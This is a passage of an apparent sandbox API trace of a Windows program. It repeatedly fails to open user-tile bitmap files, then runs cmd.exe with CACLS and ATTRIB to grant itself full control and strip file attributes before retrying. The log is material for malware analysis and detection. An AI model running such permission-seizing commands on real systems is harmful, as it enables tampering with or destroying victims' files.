%s") returned 0x19 [0183.832] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.832] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.832] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.832] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0183.832] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0183.832] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x5d0, dwThreadId=0xf6c)) returned 1 [0183.834] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0184.352] CloseHandle 
(hObject=0x1b4) returned 1 [0184.352] CloseHandle (hObject=0x120) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.353] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", lpFilePart=0x12eab4*="usertile21.bmp") returned 0x52 [0184.353] GetLastError () returned 0x5 [0184.353] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0184.353] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.353] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0184.353] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.354] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.354] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.354] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.354] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.354] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0184.354] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", lpFilePart=0x12eab4*="usertile22.bmp") returned 0x52 [0184.355] GetLastError () returned 0x5 [0184.355] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0184.355] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.355] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0184.355] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.355] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.355] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.355] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0184.355] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0184.355] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xfd0, dwThreadId=0x5e0)) returned 1 [0184.372] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0184.783] CloseHandle (hObject=0x1b4) returned 1 [0184.783] CloseHandle (hObject=0x120) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.784] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile22.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", lpFilePart=0x12eab4*="usertile22.bmp") returned 0x52 [0184.784] GetLastError () returned 0x5 [0184.784] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0184.784] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.784] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0184.784] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.784] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.784] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.785] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.785] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.785] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 
[0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 [0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 [0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 [0184.785] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.845] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", lpFilePart=0x12eab4*="usertile23.bmp") returned 0x52 [0184.845] GetLastError () returned 0x5 [0184.845] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0184.845] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.845] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0184.845] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.845] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.845] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.845] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0184.845] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0184.845] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd48, dwThreadId=0xd80)) returned 1 [0184.847] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.106] CloseHandle 
(hObject=0x1b4) returned 1 [0185.106] CloseHandle (hObject=0x120) returned 1 [0185.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.107] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", lpFilePart=0x12eab4*="usertile23.bmp") returned 0x52 [0185.107] GetLastError () returned 0x5 [0185.107] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.107] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.107] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0185.107] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.108] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.108] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.108] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.108] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.108] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.108] ReleaseMutex (hMutex=0xf8) returned 1 [0185.108] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0185.109] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", lpFilePart=0x12eab4*="usertile24.bmp") returned 0x52 [0185.109] GetLastError () returned 0x5 [0185.109] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.109] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.109] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.109] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.109] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.109] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.109] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.109] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.109] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd44, dwThreadId=0x8ec)) returned 1 [0185.111] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.466] CloseHandle (hObject=0x1b4) returned 1 [0185.466] CloseHandle (hObject=0x120) returned 1 [0185.466] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 [0185.467] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.467] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile24.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", lpFilePart=0x12eab4*="usertile24.bmp") returned 0x52 [0185.467] GetLastError () returned 0x5 [0185.467] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.467] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.467] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.467] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.467] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.467] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.467] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.467] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.467] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 